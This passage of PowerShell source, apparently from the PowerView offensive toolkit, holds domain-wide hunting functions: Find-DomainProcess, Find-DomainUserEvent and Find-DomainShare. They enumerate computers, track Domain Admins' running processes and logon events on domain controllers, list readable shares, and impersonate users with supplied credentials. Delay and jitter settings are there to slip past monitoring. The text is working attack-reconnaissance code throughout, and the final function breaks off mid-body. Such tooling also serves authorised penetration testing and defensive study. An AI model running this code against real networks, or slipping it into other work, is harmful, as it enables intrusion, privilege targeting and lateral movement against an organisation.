'TargetUser')] + [ValidateNotNullOrEmpty()] + [String] + $UserLDAPFilter, + + [Parameter(ParameterSetName = 'TargetUser')] + [ValidateNotNullOrEmpty()] + [String] + $UserSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('GroupName', 'Group')] + [String[]] + $UserGroupIdentity = 'Domain Admins', + + [Parameter(ParameterSetName = 'TargetUser')] + [Alias('AdminCount')] + [Switch] + $UserAdminCount, + + [ValidateNotNullOrEmpty()] + 
[Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $StopOnSuccess, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if 
($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + $UserSearcherArguments = @{ + 'Properties' = 'samaccountname' + } + if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity } + if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter } + if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + + # first, build the set of computers to enumerate + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-DomainProcess] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-DomainProcess] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainProcess] No hosts found to enumerate' + } + + # now build the user target set + if 
($PSBoundParameters['ProcessName']) { + $TargetProcessName = @() + ForEach ($T in $ProcessName) { + $TargetProcessName += $T.Split(',') + } + if ($TargetProcessName -isnot [System.Array]) { + $TargetProcessName = [String[]] @($TargetProcessName) + } + } + elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname + } + else { + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential } + $GroupSearcherArguments + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $ProcessName, $TargetUsers, $Credential) + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # try to enumerate all active processes on the remote host + # and search for a specific process name + if 
($Credential) { + $Processes = Get-WMIProcess -Credential $Credential -ComputerName $TargetComputer -ErrorAction SilentlyContinue + } + else { + $Processes = Get-WMIProcess -ComputerName $TargetComputer -ErrorAction SilentlyContinue + } + ForEach ($Process in $Processes) { + # if we're hunting for a process name or comma-separated names + if ($ProcessName) { + if ($ProcessName -Contains $Process.ProcessName) { + $Process + } + } + # if the session user is in the target list, display some output + elseif ($TargetUsers -Contains $Process.User) { + $Process + } + } + } + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainProcess] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainProcess] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainProcess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetProcessName, $TargetUsers, $Credential + $Result + + if ($Result -and $StopOnSuccess) { + Write-Verbose "[Find-DomainProcess] Target user found, returning early" + return + } + } + } + else { + Write-Verbose "[Find-DomainProcess] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'ProcessName' = $TargetProcessName + 'TargetUsers' = $TargetUsers + 'Credential' = $Credential + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers 
-ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } +} + + +function Find-DomainUserEvent { +<# +.SYNOPSIS + +Finds logon events on the current (or remote domain) for the specified users. + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction + +.DESCRIPTION + +Enumerates all domain controllers from the specified -Domain +(default of the local domain) using Get-DomainController, enumerates +the logon events for each using Get-DomainUserEvent, and filters +the results based on the targeting criteria. + +.PARAMETER ComputerName + +Specifies an explicit computer name to retrieve events from. + +.PARAMETER Domain + +Specifies a domain to query for domain controllers to enumerate. +Defaults to the current domain. + +.PARAMETER Filter + +A hashtable of PowerView.LogonEvent properties to filter for. +The 'op|operator|operation' clause can have '&', '|', 'and', or 'or', +and is 'or' by default, meaning at least one clause matches instead of all. +See the exaples for usage. + +.PARAMETER StartTime + +The [DateTime] object representing the start of when to collect events. +Default of [DateTime]::Now.AddDays(-1). + +.PARAMETER EndTime + +The [DateTime] object representing the end of when to collect events. +Default of [DateTime]::Now. + +.PARAMETER MaxEvents + +The maximum number of events (per host) to retrieve. Default of 5000. + +.PARAMETER UserIdentity + +Specifies one or more user identities to search for. + +.PARAMETER UserDomain + +Specifies the domain to query for users to search for, defaults to the current domain. + +.PARAMETER UserLDAPFilter + +Specifies an LDAP query string that is used to search for target users. + +.PARAMETER UserSearchBase + +Specifies the LDAP source to search through for target users. +e.g. 
"LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER UserGroupIdentity + +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +.PARAMETER UserAdminCount + +Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged). + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target computer(s). + +.PARAMETER StopOnSuccess + +Switch. Stop hunting after finding after finding a target user. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainUserEvent + +Search for any user events matching domain admins on every DC in the current domain. 
+ +.EXAMPLE + +$cred = Get-Credential dev\administrator +Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john' + +Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local' +domain controller using the alternate credential + +.EXAMPLE + +'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'} + +Find user events on the primary.testlab.local system where the event matches +the IPAddress '192.168.52.200' or '192.168.52.201'. + +.EXAMPLE + +$cred = Get-Credential testlab\administrator +Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'} + +Find user events mathing the specified GUID AND the specified TargetLogonId, searching +through every domain controller in the current domain, enumerating each DC in serial +instead of in a threaded manner, using the alternate credential. + +.OUTPUTS + +PowerView.LogonEvent + +PowerView.ExplicitCredentialLogon + +.LINK + +http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerView.LogonEvent')] + [OutputType('PowerView.ExplicitCredentialLogon')] + [CmdletBinding(DefaultParameterSetName = 'Domain')] + Param( + [Parameter(ParameterSetName = 'ComputerName', Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('dnshostname', 'HostName', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName, + + [Parameter(ParameterSetName = 'Domain')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + 
[ValidateNotNullOrEmpty()] + [Hashtable] + $Filter, + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [DateTime] + $StartTime = [DateTime]::Now.AddDays(-1), + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [DateTime] + $EndTime = [DateTime]::Now, + + [ValidateRange(1, 1000000)] + [Int] + $MaxEvents = 5000, + + [ValidateNotNullOrEmpty()] + [String[]] + $UserIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $UserDomain, + + [ValidateNotNullOrEmpty()] + [String] + $UserLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $UserSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('GroupName', 'Group')] + [String[]] + $UserGroupIdentity = 'Domain Admins', + + [Alias('AdminCount')] + [Switch] + $UserAdminCount, + + [Switch] + $CheckAccess, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $StopOnSuccess, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $UserSearcherArguments = @{ + 'Properties' = 'samaccountname' + } + if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity } + if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter } + if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase } + if 
($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname + } + elseif ($PSBoundParameters['UserGroupIdentity'] -or (-not $PSBoundParameters['Filter'])) { + # otherwise we're querying a specific group + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + Write-Verbose "UserGroupIdentity: $UserGroupIdentity" + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { 
$GroupSearcherArguments['Credential'] = $Credential } + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } + + # build the set of computers to enumerate + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + # if not -ComputerName is passed, query the current (or target) domain for domain controllers + $DCSearcherArguments = @{ + 'LDAP' = $True + } + if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential } + Write-Verbose "[Find-DomainUserEvent] Querying for domain controllers in domain: $Domain" + $TargetComputers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname + } + if ($TargetComputers -and ($TargetComputers -isnot [System.Array])) { + $TargetComputers = @(,$TargetComputers) + } + Write-Verbose "[Find-DomainUserEvent] TargetComputers length: $($TargetComputers.Length)" + Write-Verbose "[Find-DomainUserEvent] TargetComputers $TargetComputers" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainUserEvent] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential) + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $DomainUserEventArgs = @{ + 'ComputerName' = $TargetComputer + } + if ($StartTime) { $DomainUserEventArgs['StartTime'] = $StartTime } + if ($EndTime) { $DomainUserEventArgs['EndTime'] = $EndTime } + if ($MaxEvents) { $DomainUserEventArgs['MaxEvents'] = $MaxEvents } + if ($Credential) { $DomainUserEventArgs['Credential'] = $Credential } + if ($Filter -or $TargetUsers) { + if 
($TargetUsers) { + Get-DomainUserEvent @DomainUserEventArgs | Where-Object {$TargetUsers -contains $_.TargetUserName} + } + else { + $Operator = 'or' + $Filter.Keys | ForEach-Object { + if (($_ -eq 'Op') -or ($_ -eq 'Operator') -or ($_ -eq 'Operation')) { + if (($Filter[$_] -match '&') -or ($Filter[$_] -eq 'and')) { + $Operator = 'and' + } + } + } + $Keys = $Filter.Keys | Where-Object {($_ -ne 'Op') -and ($_ -ne 'Operator') -and ($_ -ne 'Operation')} + Get-DomainUserEvent @DomainUserEventArgs | ForEach-Object { + if ($Operator -eq 'or') { + ForEach ($Key in $Keys) { + if ($_."$Key" -match $Filter[$Key]) { + $_ + } + } + } + else { + # and all clauses + ForEach ($Key in $Keys) { + if ($_."$Key" -notmatch $Filter[$Key]) { + break + } + $_ + } + } + } + } + } + else { + Get-DomainUserEvent @DomainUserEventArgs + } + } + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainUserEvent] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainUserEvent] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainUserEvent] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential + $Result + + if ($Result -and $StopOnSuccess) { + Write-Verbose "[Find-DomainUserEvent] Target user found, returning early" + return + } + } + } + else { + Write-Verbose "[Find-DomainUserEvent] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams 
= @{ + 'StartTime' = $StartTime + 'EndTime' = $EndTime + 'MaxEvents' = $MaxEvents + 'TargetUsers' = $TargetUsers + 'Filter' = $Filter + 'Credential' = $Credential + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } +} + + +function Find-DomainShare { +<# +.SYNOPSIS + +Searches for computer shares on the domain. If -CheckShareAccess is passed, +then only shares the current user has read access to are returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. If -CheckShareAccess is passed, then +[IO.Directory]::GetFiles() is used to check if the current user has read +access to the given share. If -Credential is passed, then +Invoke-UserImpersonation is used to impersonate the specified user before +enumeration, reverting after with Invoke-RevertToSelf. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. 
+ +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER CheckShareAccess + +Switch. Only display found shares that the local user has access to. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainShare + +Find all domain shares in the current domain. + +.EXAMPLE + +Find-DomainShare -CheckShareAccess + +Find all domain shares in the current domain that the current user has +read access to. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches for domain shares in the testlab.local domain using the specified alternate credentials. 
+ +.OUTPUTS + +PowerView.ShareInfo +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ShareInfo')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [Alias('Domain')] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Alias('CheckAccess')] + [Switch] + $CheckShareAccess, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] 
= $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-DomainShare] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-DomainShare] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainShare] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $CheckShareAccess, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # get the shares for this host and check what we find + $Shares = Get-NetShare -ComputerName $TargetComputer + 
ForEach ($Share in $Shares) { + $ShareName = $Share.Name + # $Remark = $Share.Remark + $Path = '\\'+$TargetComputer+'\'+$ShareName + + if (($ShareName) -and ($ShareName.trim() -ne '')) { + # see if we want to check access to this share + if ($CheckShareAccess) { + # check if the user has access to this path + try { + $Null = [IO.Directory]::GetFiles($Path) + $Share + } + catch { + Write-Verbose "Error accessing share path $Path : $_" + } + } + else { + $Share + } + } + } + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainShare] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainShare] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainShare] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $CheckShareAccess, $LogonToken + } + } + else { + Write-Verbose "[Find-DomainShare] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'CheckShareAccess' = $CheckShareAccess + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params 
